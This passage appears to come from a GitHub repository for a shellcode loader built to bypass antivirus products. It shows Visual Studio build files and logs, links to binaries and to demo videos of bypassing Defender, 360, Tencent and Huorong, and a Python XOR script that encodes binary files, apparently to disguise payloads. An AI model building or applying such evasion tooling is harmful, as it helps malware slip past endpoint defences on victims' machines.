113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <FunctionLevelLinking>true</FunctionLevelLinking>
117 |       <IntrinsicFunctions>true</IntrinsicFunctions>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |     </ClCompile>
122 |     <Link>
123 |       <SubSystem>Console</SubSystem>
124 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
125 |       <OptimizeReferences>true</OptimizeReferences>
126 |       <GenerateDebugInformation>true</GenerateDebugInformation>
127 |     </Link>
128 |   </ItemDefinitionGroup>
129 |   <ItemGroup>
130 |     <ClCompile Include="test.cpp" />
131 |   </ItemGroup>
132 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
133 |   <ImportGroup Label="ExtensionTargets">
134 |   </ImportGroup>
135 | </Project>


--------------------------------------------------------------------------------
/test/test.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="源文件">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="头文件">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="资源文件">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="test.cpp">
19 |       <Filter>源文件</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/test/test.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/test/test/x64/Release/test.exe.recipe:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project>
 3 |   <ProjectOutputs>
 4 |     <ProjectOutput>
 5 |       <FullPath>C:\Users\Jason\source\repos\test\x64\Release\test.exe</FullPath>
 6 |     </ProjectOutput>
 7 |   </ProjectOutputs>
 8 |   <ContentFiles />
 9 |   <SatelliteDlls />
10 |   <NonRecipeFileRefs />
11 | </Project>


--------------------------------------------------------------------------------
/test/test/x64/Release/test.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.iobj


--------------------------------------------------------------------------------
/test/test/x64/Release/test.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.ipdb


--------------------------------------------------------------------------------
/test/test/x64/Release/test.log:
--------------------------------------------------------------------------------
1 |   test.cpp
2 |   正在生成代码
3 |   3 of 380 functions ( 0.8%) were compiled, the rest were copied from previous compilation.
4 |     2 functions were new in current compilation
5 |     1 functions had inline decision re-evaluated but remain unchanged
6 |   已完成代码的生成
7 |   test.vcxproj -> C:\Users\Jason\source\repos\test\x64\Release\test.exe
8 | 


--------------------------------------------------------------------------------
/test/test/x64/Release/test.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.obj


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/Cl.items.tlog:
--------------------------------------------------------------------------------
1 | C:\Users\Jason\source\repos\test\test.cpp;C:\Users\Jason\source\repos\test\test\x64\Release\test.obj
2 | 


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/link.secondary.1.tlog:
--------------------------------------------------------------------------------
1 | ^C:\USERS\JASON\SOURCE\REPOS\TEST\TEST\X64\RELEASE\TEST.OBJ
2 | C:\Users\Jason\source\repos\test\test\x64\Release\test.IPDB
3 | C:\Users\Jason\source\repos\test\test\x64\Release\test.iobj
4 | 


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/test.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/test/test/x64/Release/test.tlog/test.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
2 | Release|x64|C:\Users\Jason\source\repos\test\|
3 | 


--------------------------------------------------------------------------------
/test/test/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/test/x64/Release/vc143.pdb


--------------------------------------------------------------------------------
/test/x64/Release/test.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/x64/Release/test.exe


--------------------------------------------------------------------------------
/test/x64/Release/test.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/test/x64/Release/test.pdb


--------------------------------------------------------------------------------
/videos/360bypass.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/videos/360bypass.mp4


--------------------------------------------------------------------------------
/videos/defender_bypass.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/videos/defender_bypass.mp4


--------------------------------------------------------------------------------
/videos/tencent&huorong.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/videos/tencent&huorong.mp4


--------------------------------------------------------------------------------
/xor.py:
--------------------------------------------------------------------------------
 1 | def xor_encrypt_decrypt(input_file, output_file, key=0x5A):  
 2 |     """  
 3 |     使用 XOR 加密或解密二进制文件。  
 4 |     
 5 |     :param input_file: 输入文件路径  
 6 |     :param output_file: 输出文件路径  
 7 |     :param key: XOR 密钥，默认为 0x5A  
 8 |     """  
 9 |     try:  
10 |         # 打开输入文件（以二进制模式读取）  
11 |         with open(input_file, 'rb') as f_in:  
12 |             data = f_in.read()  
13 |         
14 |         # 对数据进行 XOR 操作  
15 |         encrypted_data = bytearray([byte ^ key for byte in data])  
16 |         
17 |         # 将加密/解密后的数据写入输出文件  
18 |         with open(output_file, 'wb') as f_out:  
19 |             f_out.write(encrypted_data)  
20 |         
21 |         print(f"文件已成功处理，输出文件为: {output_file}")  
22 |     except FileNotFoundError:  
23 |         print(f"错误: 找不到文件 {input_file}")  
24 |     except Exception as e:  
25 |         print(f"发生错误: {e}")  
26 | 
27 | # 示例用法  
28 | if __name__ == "__main__":  
29 |     input_file = "input.bin"  # 输入文件路径  
30 |     output_file = "output.bin"  # 输出文件路径  
31 |     xor_encrypt_decrypt(input_file, output_file)  


--------------------------------------------------------------------------------